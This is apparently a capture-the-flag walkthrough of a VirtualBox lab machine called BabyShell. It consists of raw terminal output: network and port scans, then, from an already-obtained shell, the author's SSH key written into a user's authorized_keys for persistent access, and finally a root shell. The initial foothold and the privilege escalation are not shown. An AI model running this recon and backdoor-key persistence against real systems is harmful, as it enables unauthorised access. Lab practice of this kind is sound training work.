┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth1 192.168.56.1/24 [sudo] password for kali: Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied WARNING: host part of 192.168.56.1/24 is non-zero Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.56.1 0a:00:27:00:00:03 (Unknown: locally administered) 192.168.56.100 08:00:27:f2:55:9c (Unknown) 192.168.56.171 08:00:27:71:52:25 (Unknown) 192.168.56.172 08:00:27:04:08:be (Unknown)
4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.076 seconds (123.31 hosts/sec). 4 responded
端口扫描
1 2 3 4 5 6 7 8 9 10 11 12
┌──(kali㉿kali)-[~] └─$ nmap -p- 192.168.56.172 Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-09 03:47 EST Nmap scan report for 192.168.56.172 Host is up (0.0011s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:04:08:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 23.48 seconds
zero@BabyShell:/$ cd ~ cd ~ zero@BabyShell:~$ ls -al ls -al total 24 drwx------ 2 zero zero 4096 Nov 8 03:55 . drwxr-xr-x 4 root root 4096 Nov 7 21:53 .. -rw-r--r-- 1 zero zero 220 Nov 7 21:53 .bash_logout -rw-r--r-- 1 zero zero 3526 Nov 7 21:53 .bashrc -rw-r--r-- 1 zero zero 807 Nov 7 21:53 .profile -rw-r--r-- 1 root root 44 Nov 8 03:55 user.txt zero@BabyShell:~$ mkdir .ssh mkdir .ssh zero@BabyShell:~$ cd .ssh cd .ssh zero@BabyShell:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCTOs32i2ckeuT9G8oFp/OSLxlx2Zyao/+yLFr6u8qJakKQZoqPDWTA7pJnD0b0eN3f0nb3z0u8erAclrJPQ9uRt5JieMeXU2B2qHQrTLzcp0ouZoeKwsaYEHKJLpV4SCFa4PCzVooVIopwHBqhwt6utL7hchwSNu9DUrRrtjV2WgXdLq1vjVP8iNSTldAgYdiIjddRzLjGebaSWcUH7DnDvcztW10iMqiaZgeHRI5uriTChVqHTzhCNXo8oO6787uVQUP19ydl9YxEtKSCKccJ4lwddJxxRblZoTUkELep6hdJLadYKRlIGUB9Enwj1ZyreZsNCn0S+1v9T16iE4E/aGNcfADkSin9vqi9x/XbXVuCK19qBx1lr1LS/y0nrPiaGCPl7TYwSpUGdY7QcIGCsesKvlXdZ4WshPUzjCok8zLSRTFAKk3MQK1HNCr7nx0SqJHPNCR6BFKtnNRBMTnzMpiS9sKl9de2WQphsCmiXAxujmJvNc1T+1vadm3NNZ6OqfS14laBS+rQnft1QuHmC1gAKLAnUExHIUJdFY/PgXhbVrjK+H2jyLSGfXnYbXP99c9f0Rm46SBdK1SoMgFjwVXSR3JEVM9NKcml2Uia+ObwEK0jSkP2I21Dyo6YM0s6DQ9AZfFN09XQfIJT8e9ZlCI7eGg0vd1/ulnlJiFKpQ== kali@kali' > authorized_keys <I7eGg0vd1/ulnlJiFKpQ== kali@kali' > authorized_keys zero@BabyShell:~/.ssh$ chmod 600 authorized_keys chmod 600 authorized_keys zero@BabyShell:~/.ssh$ cd .. cd .. zero@BabyShell:~$ chmod 700 .ssh chmod 700 .ssh zero@BabyShell:~$ exit exit exit ┌──(kali㉿kali)-[~/Desktop] └─$ ssh zero@192.168.56.172 The authenticity of host '192.168.56.172 (192.168.56.172)' can't be established. ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:9: [hashed name] ~/.ssh/known_hosts:11: [hashed name] ~/.ssh/known_hosts:16: [hashed name] ~/.ssh/known_hosts:17: [hashed name] ~/.ssh/known_hosts:18: [hashed name] ~/.ssh/known_hosts:19: [hashed name] ~/.ssh/known_hosts:20: [hashed name] ~/.ssh/known_hosts:21: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? tes Please type 'yes', 'no' or the fingerprint: yes Warning: Permanently added '192.168.56.172' (ED25519) to the list of known hosts. Linux BabyShell 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. zero@BabyShell:~$
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Nov 8 03:52:57 2025 from 192.168.3.94 root@BabyShell:~# id uid=0(root) gid=0(root) groups=0(root) root@BabyShell:~#